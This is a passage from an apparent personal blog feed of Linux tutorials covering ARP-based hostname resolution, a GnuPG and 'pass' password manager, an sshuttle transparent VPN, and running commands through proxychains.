name you chose behind it. You can find your MAC-address in various ways, but the easiest is just running the ifconfig command on linux. (look next to “ether”) [root@localhost]# ifconfig wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.13 netmask 255.255.255.0 broadcast 192.168.1.255 ether 10:02:b5:d6:08:8a txqueuelen 1000 (Ethernet) RX packets 221361 bytes 303819415 (289.7 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 112644 bytes 15169217 (14.4 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ... You will need the tool arp-scan to run this script, you can find it in nearly all repositories. I run this script on an android phone, a desktop, chromebook and Raspberry Pi. So no worries. If you check the /etc/hosts file you can see the following has changed: # # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file 192.168.1.3 s1 s1 #DYNAMIC_RESOLVE 192.168.1.2 kh1 kh1 #DYNAMIC_RESOLVE You can now use the hostnames in most commands and have them automatically resolved; ssh s1 #resolves to the IP adress of my phone ssh root@kh1 -p 22 #same but with more arguments You can alias the ARP-A-HOST.sh-script command in you bashrc](https://demgeeks.com/qt-make-the-command-line-easier-with-aliases-and-functions/) to make it easier to use. There is also a Github-repo that contains all the files needed. That’s it! have fun!Setting Up a GnuPG-based Password Manager2017-09-23T00:00:00+00:002017-09-23T00:00:00+00:00https://lvlrt.github.io/2017/09/23/gnupg-based-password-manager<p><img src="/assets/encryption.jpg" alt="Header" /></p>
<p>In this article we will setup a secure password manager. You probably use the same password over and over again on multiple sites/devices/applications. Not so great! If one service gets compromised, an attacker can wreak some serious havoc. <strong>YOU SHOULD USE DIFFERENT PASSWORDS!</strong></p>
<p>But this is hard, so many store their passwords in a passwords.txt file on their desktop, or even better, in a service like Dropbox storing all passwords together and keeping that file synced. Copying passwords will also circumvent <a href="https://en.wikipedia.org/wiki/Keystroke_logging">keyloggers</a> active on your system. So awesome right?!</p>
<p>Not really, If one of your devices gets compromised, or Dropbox makes a mistake, you are screwed. You should still have an extra layer of access protection between the file and the passwords, syncing with Dropbox can be fine, but you have to encrypt the file.</p>
<h2>About password managers</h2>
<p>One option is using tools like <a href="http://keepass.info/">Keepass</a> or <a href="https://1password.com/">1Password</a>.
But you are depending on that service, its not modular (you can not choose the way it gets synced).
I don’t like trusting these services.
Not only the communication but things like encryption type, memory leaks, temporary files can all be badly designed.
<a href="https://www.coredna.com/blogs/comparing-open-closed-source-software">Open-source</a> tools are the way to go, because you can trust AND verify.</p>
<p>The best way to do this is with <a href="https://en.wikipedia.org/wiki/Public-key_cryptography">asymmetric encryption</a>.
Their are standards such as <a href="https://nl.wikipedia.org/wiki/Pretty_Good_Privacy">PGP</a> (<a href="https://www.gnupg.org/">GnuPG</a> on linux) who make this easy.
The encryption is very strong because you use a long encryption key, to decrypt your target file.</p>
<p>The long encryption key is stored locally on your machines, and you need a passphrase to use it.
So even if the can get access to the long secure encryption key (private key). They will still need the passphrase.</p>
<p>This is not all that <a href="https://www.gnupg.org/">GnuPG</a> can do, it is an amazing piece of work, if interested, you should check it out.
A nice place to get started with using it is this <a href="https://wiki.archlinux.org/index.php/GnuPG">Arch Linux page</a> about GnuPG.</p>
<p>I use the terminal everywhere and there is a cli-tool named <a href="https://wiki.archlinux.org/index.php/Pass">pass</a> to automate the usage of GnuPG for passwords. We will use that to manage our passwords.
The cool thing about the pass password-manager, is its cross platform uniform behavior. You know how to use it on one platform and you know it on all your other devices (more on syncing the passwords later)</p>
<h2>Dependencies</h2>
<p>You first have to install pass and GnuPG and more important, set up GnuPG and have it make a key for you (you can of course use an already existing key, but then you would not be reading this). Do what is right on your system:</p>
<p><strong>Debian-based;</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo apt-get install pass gnupg
</code></pre></div></div>
<p><strong>Arch Linux; </strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo pacman -Sy pass gnupg
</code></pre></div></div>
<h2>Setup your encryption key</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gpg --full-gen-key
</code></pre></div></div>
<p>Now gpg will ask you a couple questions, like what kind of key you want, press 1.
I chose a key-size of 4096, which is the highest possible. Then put in 0 for a everlasting key, confirm you choice.
Then it will ask for a name, email and comment (like “created pm 27/12/2016”).
Confirm with pressing <code class="language-plaintext highlighter-rouge">O</code> and ENTER. Then STOP!</p>
<p>You should now have the following output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost ~]# gpg --full-gen-key
gpg (GnuPG) 2.2.4; Copyright (C) 2017 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Please select what kind of key you want:
(1) RSA and RSA (default)
(2) DSA and Elgamal
(3) DSA (sign only)
(4) RSA (sign only)
Your selection? 1
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048) 4096
Requested keysize is 4096 bits
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0) 0
Key does not expire at all
Is this correct? (y/N) y
GnuPG needs to construct a user ID to identify your key.
Real name: lvlrt
Email address: gpg@larsveelaert.com
Comment: Thisismycomment
You selected this USER-ID:
"lvlrt (Thisismycomment) <gpg@larsveelaert.com>"
Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
Please enter the passphrase to
protect your new key
Passphrase:
</code></pre></div></div>
<p>Now put a YouTube video playing, setup a file copy from and to your disk for 10 minutes or something.
Then go back to your console and it will have asked for a password. Fill in the password while your device is doing the heavy work. Confirm and you are done.</p>
<p>You can close your YouTube video and the file transfer. This was to generate some computer noise. Which will improve the randomness of the generated key!</p>
<p>To test if the key was successfully created enter the following command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost ~]# gpg --list-keys
...
----------------------------
pub rsa2048 2018-01-10 [SC]
927A1402D78C9188216F233841CB4088BBF533E9
uid [ultimate] lvlrt (test) <gpg@larsveelaert.com>
</code></pre></div></div>
<p>Ok great!, let us now get pass setup, you can do that with this command:
(where the <code class="language-plaintext highlighter-rouge"><id></code> value is your email or name you just put in)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pass init <id>
</code></pre></div></div>
<p>Then it will output the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost ~]# pass init gpg@larsveelaert.com
mkdir: created directory '/home/king/.password-store/'
Password store initialized for gpg@larsveelaert.com
</code></pre></div></div>
<p>Setup done!</p>
<h2>Usage</h2>
<p><strong>To insert a password in your password-store:</strong></p>
<pre>pass insert stuffathome/thingseverybodyshouldknow/wifipassword</pre>
<p>You can keep adding or removing ‘/’ signs to make more divisions in your password-store.</p>
<p>These will just be added as descending folders.</p>
<p>To have it instead generate a password for you (if you want to be extra safe) and store it in an encrypted file:</p>
<pre>pass generate stuffathome/thingseverybodyshouldknow/wifipassword</pre>
<p><strong>No password asked? Isn’t this unsafe?</strong></p>
<p>The way we encrypted this password-store is asymmetrical… so everybody can encrypt, but only the ones with a private key can decrypt.</p>
<p><strong>To list the available passwords just type:</strong></p>
<pre>pass show</pre>
<p><strong>To retrieve the password we just created, do:</strong></p>
<pre>pass show stuffathome/thingseverybodyshouldknow/wifipassword</pre>
<p>And now it will ask for your passphrase of the gpg key you specified in the setup command. Then it should echo the password out. And thats really all you need to know to use this password manager. The key will be available for a small time until it timed out. That’s it!</p>
<h2>Syncing your passwords</h2>
<p>To synchronize your password manager between devices. You need to synchronize 2 sets of files. The first one is you gpg key. Those are stored in the folder ~/.gnupg by default. You can change the location where GnuPG checks for these files with setting the $GNUPGHOME variable:</p>
<pre>export GNUPGHOME="~/keys"</pre>
<p>Now you can move your .gnupg folder to a new location and put the new location in this variable. REMINDER: you have to put this command in your ~/.bashrc file or alias it with your pass command (more on that later).</p>
<p>You passwords are stored in a directory, called a store, this is the one that pass has setup for you. The default location is ~/.password-store. If you use change the variables $PASSWORD_STORE_DIR and $PASSWORDS_STORE_GIT to the location where your store is. So all this in one command (put this in ~/.bashrc):</p>
<pre>alias pass='GNUPGHOME=~/keys PASSWORD_STORE_DIR=~/DATA/PASSWORDS PASSWORD_STORE_GIT=~/DATA/PASSWORDS pass'</pre>
<p>This alias command, will make your pass command always use these variables. You copy the passwords-store and key to a service like Dropbox or in a synced git-repository, put the path to these directories in the command and you are set! Please keep the key and password-store seperate, it is still protected by a passphrase but you lose the protection of you 4096-bit key.</p>
<p>That’s it! Good Luck with your password manager!</p>Lars VeelaertIn this article we will setup a secure password manager. You probably use the same password over and over again on multiple sites/devices/applications. Not so great! If one service gets compromised, an attacker can wreak some serious havoc. YOU SHOULD USE DIFFERENT PASSWORDS! But this is hard, so many store their passwords in a passwords.txt file on their desktop, or even better, in a service like Dropbox storing all passwords together and keeping that file synced. Copying passwords will also circumvent keyloggers active on your system. So awesome right?! Not really, If one of your devices gets compromised, or Dropbox makes a mistake, you are screwed. You should still have an extra layer of access protection between the file and the passwords, syncing with Dropbox can be fine, but you have to encrypt the file. About password managers One option is using tools like Keepass or 1Password. But you are depending on that service, its not modular (you can not choose the way it gets synced). I don’t like trusting these services. Not only the communication but things like encryption type, memory leaks, temporary files can all be badly designed. Open-source tools are the way to go, because you can trust AND verify. The best way to do this is with asymmetric encryption. Their are standards such as PGP (GnuPG on linux) who make this easy. The encryption is very strong because you use a long encryption key, to decrypt your target file. The long encryption key is stored locally on your machines, and you need a passphrase to use it. So even if the can get access to the long secure encryption key (private key). They will still need the passphrase. This is not all that GnuPG can do, it is an amazing piece of work, if interested, you should check it out. A nice place to get started with using it is this Arch Linux page about GnuPG. I use the terminal everywhere and there is a cli-tool named pass to automate the usage of GnuPG for passwords. We will use that to manage our passwords. The cool thing about the pass password-manager, is its cross platform uniform behavior. You know how to use it on one platform and you know it on all your other devices (more on syncing the passwords later) Dependencies You first have to install pass and GnuPG and more important, set up GnuPG and have it make a key for you (you can of course use an already existing key, but then you would not be reading this). Do what is right on your system: Debian-based; sudo apt-get install pass gnupg Arch Linux; sudo pacman -Sy pass gnupg Setup your encryption key gpg --full-gen-key Now gpg will ask you a couple questions, like what kind of key you want, press 1. I chose a key-size of 4096, which is the highest possible. Then put in 0 for a everlasting key, confirm you choice. Then it will ask for a name, email and comment (like “created pm 27/12/2016”). Confirm with pressing O and ENTER. Then STOP! You should now have the following output: [root@localhost ~]# gpg --full-gen-key gpg (GnuPG) 2.2.4; Copyright (C) 2017 Free Software Foundation, Inc. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Please select what kind of key you want: (1) RSA and RSA (default) (2) DSA and Elgamal (3) DSA (sign only) (4) RSA (sign only) Your selection? 1 RSA keys may be between 1024 and 4096 bits long. What keysize do you want? (2048) 4096 Requested keysize is 4096 bits Please specify how long the key should be valid. 0 = key does not expire <n> = key expires in n days <n>w = key expires in n weeks <n>m = key expires in n months <n>y = key expires in n years Key is valid for? (0) 0 Key does not expire at all Is this correct? (y/N) y GnuPG needs to construct a user ID to identify your key. Real name: lvlrt Email address: gpg@larsveelaert.com Comment: Thisismycomment You selected this USER-ID: "lvlrt (Thisismycomment) <gpg@larsveelaert.com>" Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O We need to generate a lot of random bytes. It is a good idea to perform some other action (type on the keyboard, move the mouse, utilize the disks) during the prime generation; this gives the random number generator a better chance to gain enough entropy. Please enter the passphrase to protect your new key Passphrase: Now put a YouTube video playing, setup a file copy from and to your disk for 10 minutes or something. Then go back to your console and it will have asked for a password. Fill in the password while your device is doing the heavy work. Confirm and you are done. You can close your YouTube video and the file transfer. This was to generate some computer noise. Which will improve the randomness of the generated key! To test if the key was successfully created enter the following command: [root@localhost ~]# gpg --list-keys ... ---------------------------- pub rsa2048 2018-01-10 [SC] 927A1402D78C9188216F233841CB4088BBF533E9 uid [ultimate] lvlrt (test) <gpg@larsveelaert.com> Ok great!, let us now get pass setup, you can do that with this command: (where the <id> value is your email or name you just put in) pass init <id> Then it will output the following: [root@localhost ~]# pass init gpg@larsveelaert.com mkdir: created directory '/home/king/.password-store/' Password store initialized for gpg@larsveelaert.com Setup done! Usage To insert a password in your password-store: pass insert stuffathome/thingseverybodyshouldknow/wifipassword You can keep adding or removing ‘/’ signs to make more divisions in your password-store. These will just be added as descending folders. To have it instead generate a password for you (if you want to be extra safe) and store it in an encrypted file: pass generate stuffathome/thingseverybodyshouldknow/wifipassword No password asked? Isn’t this unsafe? The way we encrypted this password-store is asymmetrical… so everybody can encrypt, but only the ones with a private key can decrypt. To list the available passwords just type: pass show To retrieve the password we just created, do: pass show stuffathome/thingseverybodyshouldknow/wifipassword And now it will ask for your passphrase of the gpg key you specified in the setup command. Then it should echo the password out. And thats really all you need to know to use this password manager. The key will be available for a small time until it timed out. That’s it! Syncing your passwords To synchronize your password manager between devices. You need to synchronize 2 sets of files. The first one is you gpg key. Those are stored in the folder ~/.gnupg by default. You can change the location where GnuPG checks for these files with setting the $GNUPGHOME variable: export GNUPGHOME="~/keys" Now you can move your .gnupg folder to a new location and put the new location in this variable. REMINDER: you have to put this command in your ~/.bashrc file or alias it with your pass command (more on that later). You passwords are stored in a directory, called a store, this is the one that pass has setup for you. The default location is ~/.password-store. If you use change the variables $PASSWORD_STORE_DIR and $PASSWORDS_STORE_GIT to the location where your store is. So all this in one command (put this in ~/.bashrc): alias pass='GNUPGHOME=~/keys PASSWORD_STORE_DIR=~/DATA/PASSWORDS PASSWORD_STORE_GIT=~/DATA/PASSWORDS pass' This alias command, will make your pass command always use these variables. You copy the passwords-store and key to a service like Dropbox or in a synced git-repository, put the path to these directories in the command and you are set! Please keep the key and password-store seperate, it is still protected by a passphrase but you lose the protection of you 4096-bit key. That’s it! Good Luck with your password manager!A transparent poor man’s VPN with sshuttle2017-02-17T00:00:00+00:002017-02-17T00:00:00+00:00https://lvlrt.github.io/2017/02/17/poor-man-vpn<p><img src="/assets/vpn.png" alt="header" /></p>
<h2>Why?</h2>
<p>There are a lot of reasons why you would want a <a href="https://en.wikipedia.org/wiki/Proxy_server">proxy</a> or <a href="https://en.wikipedia.org/wiki/Virtual_private_network">VPN</a>, one of them is safety and protection from attackers at your location. For example if you are visiting sensitive things in your local coffee shop, other visitors could sniff your traffic because they are connected to the same network. From that point it is not only possible to read but also manupulate the ftraffic and possibly inject malicious code. Other usage cases are services who are only accessible behind a firewall or only if the user appears to be located at a certain specified IP address.</p>
<p>Most of the time, a proxy is one connection that gets rerouted while a VPN is a more client-friendly option to reroute all traffic from a system.
If you do not want to configure every application to use your proxy, and want to reroute all traffic, the tool <code class="language-plaintext highlighter-rouge">shuttle</code> is a perfect fit.
It uses SSH under the hood so the permissions are managed through your existing SSH server so no extra user management is required.</p>
<p>I you are searching for a way to only route one command or application through a proxy have a look at <a href="/2017/02/02/tip-running-a-terminal-command-through-a-proxy/">an earlier article</a> I wrote.
In a lot of cases you don’t need to search the applications native capability for configuring a proxy.
The more traffic you route through your ssh server,
the more demanding and slow the operation becomes. So keep that in mind. Let’s begin!</p>
<h2>How to install?</h2>
<p>There are 2 things you will need;</p>
<ul>
<li>A ssh server on a remote device (there are tutorials specific to your flavour of linux)</li>
<li><em><a href="https://pypi.python.org/pypi/pip">pip</a></em>, the package manager from python</li>
</ul>
<p>To install the python package manager, run one of the following commands;</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apt-get install python-pip # for debian and others
pacman -Sy python pip #for archlinux users
</code></pre></div></div>
<p>Now we can install <em>sshuttle</em>;</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pip install sshuttle
</code></pre></div></div>
<p>Done!</p>
<h3>How to setup?</h3>
<p>There are a lot of general options and specific routing options that can be configured with <code class="language-plaintext highlighter-rouge">sshuttle</code>.
But this article will just explain the transparent proxy (reroute all outgoing traffic).
You can find the full documentation <a href="https://sshuttle.readthedocs.io/en/stable/overview.html">here</a>.</p>
<p>Now,for example, if we had an SSH server located at 192.168.13.2 and properly configured to accept connections from our address, we could run;</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sshuttle --dns -vvr me@192.168.13.2:22 0/0
</code></pre></div></div>
<p>This will first make a connection to your ssh server and then start routing all traffic from your system to this location.
As you can see from the extra option. Also your DNS-requests will be tunneled.</p>
<p>To make sure there is not traffic leaked, look into network monitoring software like <a href="https://www.wireshark.org/">wireshark</a>. To test launch some applications and see if there is info being leaked.</p>
<h3>Tip for experts</h3>
<p>You can make a bash function to automate the process and be able to quickly switch between servers.
For this example we will use the basic sshuttle command, but any one of them will work.</p>
<p>You can add a function to your .bashrc-file like this;</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>proxy () {
sshuttle --dns -vvr $1 0/0
}
</code></pre></div></div>
<p>The result of this will be that you can run one of the following in your bash-prompt:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ proxy me@192.168.13.2:22
$ proxy ssh_server1
</code></pre></div></div>
<p>And it will proxy all your traffic to a preconfigured ssh server.
To use your proxy as in the second example, you will have to configure your destination in the ~/.ssh/config file from your system to make it really useful
It will even take the keys that are loaded in your SSH-agent.</p>
<p>There is awesome documentation of this program, so <a href="https://sshuttle.readthedocs.io/en/stable/overview.html">make sure to check it out</a>!</p>Lars VeelaertWhy? There are a lot of reasons why you would want a proxy or VPN, one of them is safety and protection from attackers at your location. For example if you are visiting sensitive things in your local coffee shop, other visitors could sniff your traffic because they are connected to the same network. From that point it is not only possible to read but also manupulate the ftraffic and possibly inject malicious code. Other usage cases are services who are only accessible behind a firewall or only if the user appears to be located at a certain specified IP address. Most of the time, a proxy is one connection that gets rerouted while a VPN is a more client-friendly option to reroute all traffic from a system. If you do not want to configure every application to use your proxy, and want to reroute all traffic, the tool shuttle is a perfect fit. It uses SSH under the hood so the permissions are managed through your existing SSH server so no extra user management is required. I you are searching for a way to only route one command or application through a proxy have a look at an earlier article I wrote. In a lot of cases you don’t need to search the applications native capability for configuring a proxy. The more traffic you route through your ssh server, the more demanding and slow the operation becomes. So keep that in mind. Let’s begin! How to install? There are 2 things you will need; A ssh server on a remote device (there are tutorials specific to your flavour of linux) pip, the package manager from python To install the python package manager, run one of the following commands; apt-get install python-pip # for debian and others pacman -Sy python pip #for archlinux users Now we can install sshuttle; pip install sshuttle Done! How to setup? There are a lot of general options and specific routing options that can be configured with sshuttle. But this article will just explain the transparent proxy (reroute all outgoing traffic). You can find the full documentation here. Now,for example, if we had an SSH server located at 192.168.13.2 and properly configured to accept connections from our address, we could run; sshuttle --dns -vvr me@192.168.13.2:22 0/0 This will first make a connection to your ssh server and then start routing all traffic from your system to this location. As you can see from the extra option. Also your DNS-requests will be tunneled. To make sure there is not traffic leaked, look into network monitoring software like wireshark. To test launch some applications and see if there is info being leaked. Tip for experts You can make a bash function to automate the process and be able to quickly switch between servers. For this example we will use the basic sshuttle command, but any one of them will work. You can add a function to your .bashrc-file like this; proxy () { sshuttle --dns -vvr $1 0/0 } The result of this will be that you can run one of the following in your bash-prompt: $ proxy me@192.168.13.2:22 $ proxy ssh_server1 And it will proxy all your traffic to a preconfigured ssh server. To use your proxy as in the second example, you will have to configure your destination in the ~/.ssh/config file from your system to make it really useful It will even take the keys that are loaded in your SSH-agent. There is awesome documentation of this program, so make sure to check it out!Quick tip: Running a terminal command through a proxy2017-02-02T00:00:00+00:002017-02-02T00:00:00+00:00https://lvlrt.github.io/2017/02/02/running-a-terminal-command-through-a-proxy<p>Sometimes, running a full <a href="https://en.wikipedia.org/wiki/Virtual_private_network">VPN</a> is not necessary, or there is not enough bandwidth for all your traffic.
In cases of using <a href="https://www.torproject.org/">Tor</a> for example, tunneling all your traffic can even be dangerous!
So there is a way to specify per command or program if you want to have it tunnel its web traffic through the proxy or not.
This tool is called <code class="language-plaintext highlighter-rouge">proxychains</code>.</p>
<p>If you, for example want to download a file through a proxy with the <code class="language-plaintext highlighter-rouge">wget</code> command. Just prepend the command with <code class="language-plaintext highlighter-rouge">proxychains</code> and done!</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ proxychains wget www.remoteserver.com/fileIneed
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.12
--2018-01-08 23:18:33-- http://www.remoteserver.com/fileineed
</code></pre></div></div>
<p>Great! that works, but gives some output, you can silence the extra output with the -q flag.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>proxychains -q ...
</code></pre></div></div>
<p>To set it up on your system follow the following steps:</p>
<h3>1. Installation</h3>
<p>For example on Arch Linux do:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pacman -Sy proxychains
</code></pre></div></div>
<p>On Ubuntu or other Debian-based distro’s:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apt-get install proxychains
</code></pre></div></div>
<h3>2. Configuration</h3>
<p>Proxychains has a lot of configuration options but all you need to do, is go to the end of the file /etc/proxychains.conf and edit the last line;</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#nano /etc/proxychains.conf
socks4 127.0.0.1 9050
</code></pre></div></div>
<p>It’s preconfigured to use tor,
That means a socks4 proxy on localhost port 9050.</p>
<p>Configure this to your needs, for example to use a SOCKS5 proxy made by SSH do this;</p>
<ul>
<li>Command to run to make the SSH connection
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh remoteserver -D 5000
</code></pre></div> </div>
</li>
<li>Edit the configuration file like this:
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>socks5 127.0.0.1 5000
</code></pre></div> </div>
<h3>3. Done!</h3>
</li>
</ul>
<p>That’s it, proxies can be amazing to change your appearance to the public internet, get to otherwise inaccessible content or tunnel your way out of a restrictive firewall/filter. So knowing how to use them in a terminal enviroment is essential.</p>Lars VeelaertSometimes, running a full VPN is not necessary, or there is not enough bandwidth for all your traffic. In cases of using Tor for example, tunneling all your traffic can even be dangerous! So there is a way to specify per command or program if you want to have it tunnel its web traffic through the proxy or not. This tool is called proxychains. If you, for example want to download a file through a proxy with the wget command. Just prepend the command with proxychains and done! $ proxychains wget www.remoteserver.com/fileIneed [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.12 --2018-01-08 23:18:33-- http://www.remoteserver.com/fileineed Great! that works, but gives some output, you can silence the extra output with the -q flag. proxychains -q ... To set it up on your system follow the following steps: 1. Installation For example on Arch Linux do: pacman -Sy proxychains On Ubuntu or other Debian-based distro’s: apt-get install proxychains 2. Configuration Proxychains has a lot of configuration options but all you need to do, is go to the end of the file /etc/proxychains.conf and edit the last line; #nano /etc/proxychains.conf socks4 127.0.0.1 9050 It’s preconfigured to use tor, That means a socks4 proxy on localhost port 9050. Configure this to your needs, for example to use a SOCKS5 proxy made by SSH do this; Command to run to make the SSH connection ssh remoteserver -D 5000 Edit the configuration file like this: socks5 127.0.0.1 5000 3. Done! That’s it, proxies can be amazing to change your appearance to the public internet, get to otherwise inaccessible content or tunnel your way out of a restrictive firewall/filter. So knowing how to use them in a terminal enviroment is essential.